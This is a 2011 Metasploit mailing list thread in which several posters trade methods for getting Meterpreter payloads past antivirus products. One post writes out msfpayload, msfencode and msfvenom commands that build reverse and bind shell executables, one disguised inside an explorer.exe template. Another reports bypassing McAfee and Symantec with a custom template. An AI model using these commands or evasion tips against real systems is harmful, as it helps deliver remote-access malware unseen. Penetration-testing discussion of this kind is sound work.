Home page logo

metasploit logo Metasploit mailing list archives

Re: Yet another AV bypassing question
From: Ozan UÇAR <mail () ozanucar com>
Date: Mon, 27 Jun 2011 12:08:20 +0300

Hi Everyone,
I tested msfvenom and msfpayload with msfencode. I generated a reverse
meterpreter windows executable file this following commands;

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=
LPORT=4443 R | ./msfencode -t exe -x /opt/framework-3.7.1/msf3/explorer.exe
-o 1.exe

# ./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
-f exe > 2.exe

# ./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
-t explorer.exe -f exe > 3.exe

But, avira antivir is dedected as "TR/Crypte.Epack.Gen2".

Do you have any solitions.
Thanks for suppors.

2011/6/27 Jason Hawks <jason.hawks0 () gmail com>

Hi everyone,

Thank you very much for your answers.
I wrote my own template and it did it. At least, I was able to use
java_signed_applet + meterpreter and bypass McAfee and Symantec EP.
I will try with other AV vendors as soon as I can.



2011/6/24 Jason Hawks <jason.hawks0 () gmail com>:
Hello list,

As many of you, I'm trying to bypass my AV but I'm not lucky with the
metasploit encoders anymore.

My Question is simple (but I don't know about the answer yet).

Does modifying and recompiling meterpreter source code (with spread
dummy instructions and a lot of try-and-error attempt) could help me ?
or the main problem is not in meterpreter DLL but somewhere else ?

Actually I got a try modifying the source code of meterpreter (using
Visual Studio Express), but it didn't change anything. Therefore, I'm
wondering if it's just a matter of tries or if I'm wasting my time.
Am I looking in the right direction ?

For information, I'm playing with McAfee 8.X right now.

Thank you very much for your lights. Any other tips are welcome.




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]